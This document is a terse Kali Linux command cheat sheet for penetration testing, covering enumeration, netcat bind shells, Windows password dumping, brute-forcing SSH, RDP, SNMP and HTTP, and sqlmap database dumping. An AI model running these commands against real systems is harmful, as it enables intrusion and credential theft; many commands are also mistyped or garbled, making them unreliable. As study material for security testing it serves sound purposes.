Kali Linux Command Line Guide

Cheat sheet to reference when using the terminal in Kali Linux. This guide includes the following:

Basic Commands
Netcat
NMAP
Mount Files
SNMP Enumeration
DNS Enumeration
SMB Enumeration
HTTP Enumeration
Packet Inspection
Password Generation
Password Cracking
Port Forwarding
SQL Map

Basic Commands

grep <substring> target-file = Extract the lines contains "substring"

grep -o <regex> target-file = Same as above with regular expression as input

cut -d "/" -f 3 = Split the string by "/" and output the third column

sort -u = Remove duplicate

host <hostname> = Return the IP address of the host name

wc-l access.log = Count the number of line in "access.log"

unig -c = Add the number of occurrence in front

cat access. log | cut -d "" - f1 | sort | uniq -c | sort -urn = Count the number of occurrence and sort it reversely


Netcat

nc-nv target -p <port> = Connect to specific port of the target machine

nc-nivp port -e <filename> = Listen in specific port and execute the program after connect

ncat --exec cmd.exe --allow 10.0.0.4 -vnI 4444 --SSL = Listen in port 4444, allow only 10.0.0.4 to connect, execute cm.exe after connect, encrypt with SSL

ncat -v 10.0.0.22 4444 --ssl = Connect to target at port 4444, encrypt with SSL


NMAP

nmap -v -sS -A -T4 <target> = Nmap verbose scan, runs syn stealth, T4 timing, OS and service version info, traceroute and scripts against services

nmap -v -sS -p -A -T4 <target> = As above but scans all TCP ports

nmap -v-sU -sS -p- -A -T4 <target> = As above but scans all TCP ports and UDP scan

nmap -v -p 445 -script=smb-check-vulns-script-args=unsafe=1 192.168.1.X = Map script to scan for vulnerable SMB servers

Is /us/share/nmap/scripts/* | grep ftp = Search map scripts for keywords


Mount File Shares

mount 192.168.1.1:/vol/share /mnt/nfs = Mount NFS share to /mnt/nfs

mount -t cifs -o username=user,password=pass ,domain=blah //192.168.1.X/share-name /mnt/cifs = Mount Windows CIFS / SMB share on Linux at / mnt/cifs if you remove password it will prompt on the CLI

net use Z: \win-server\share password /user:domain janedoe /savecred /p:no = Mount a Windows share on Windows from the command line


SNMP Enumeration

snmpcheck -t 192.168.1.X -c public

snmpwalk -c public -v1 192.168.1.X 1| grep hrSWRunName|cut-d* * _f

snmpenum -t 192.168.1.X

onesixtyone -c names -i hosts


DNS Enumeration & Transfer

dnsrecon -d <domain> -taxfr = Enumeration & Transfer

dnsenum <domain> = Enumeration & Transfer

SMB Enumeration

nbtscan 192.168.1.0/24 = Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain

enum4linux -a <target-ip> = Do Everything, runs all options apart from dictionary based share name guessing


HTTP Enumeration

nikto -h <target> = Perform a nikto scan against target

dirbuster = Directory finder, configure via GUI or CLI


Packet Inspection

tcpdump tcp port 80 -w output.pcap i etho = tcpdump for port 80 on interface ethO, outputs to output.pcap

Wireshark = GUI tools that perform packet inspection


Password Generation

/usr/share/wordlists/ = Kali password list

crunch 6 6 0123456789ABCDEF-o crunch1.txt = Generate password list with only 0-9, A-F character, length = 6, output to crunch1.txt

crunch 4 4 -f /us/share/crunch/charset.lst mixalpha = Generate password list with specific character set, length= 4

cewl <domain> -m 6 -w <filename.txt> = Generate password list from a website and output to .txt file

nano /etc/john/john.conf john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt = Mutate password according to the rules


Password Cracking

fgdump.exe = Dump windows password hash

wce -w = Dump the windows clear text password

medusa -h 10.11.1.219 -u admin -p password-file.txt -M http -m DIR:/admin-T 10 = HTTP Bruteforce

crack -vv --user offsec - P password-file.txt rdp://10.11.1.35 = RDP Bruteforce

hydra -P password-file.txt -v 10.11.1.219 snmp = SNMP Bruteforce

hydra -I root -P password-file.txt 10.11.1.219 ssh = SSH Bruteforce


Port Forward

ssh <gateway> -L <local port to listen>: <remote host>:<remote port> = Local port forward. 127.0.0.1:<port> is now redirected to the remote host

ssh <gateway> -R <remote port to bind>:<local host>:<local port> = Remote port forward. Access 127.0.0.1:<port> now to connect to the remote host at remote binded port

ssh -D <local proxy port> -p <remote port> <target> = Dynamic port forward. We created a SOCK proxy at local machine now.


SQL Map

sqlmap -u <domian> -forms -batch -crawl=10 -cookie=jsessionid=54321 -level=5 - risk=3 =Automated sqlmap scan

sqlmap -u TARGET -p PARAM - data=POSTDATA -cookie=COOKIE -level=3-current-user-current-db -passwords -file-read=" /var/www/blah.php" = Targeted sqlmap scan

sqlmap -u "http://meh.com/meh.php?id=1" -dbms=mysq| -tech=U -random-agent -dump = Scan url for union + error based injection with mysql backend and use a random user agent + database dump

sqlmap -o -u "http://meh.com/form/" - forms = sqlmap check form for injection

sqlmap -o -u "http://meh/vuln-form" - forms -D database-name -T users -dump = sqlmap dump and crack hashes for table users on database-name.


Happy Days.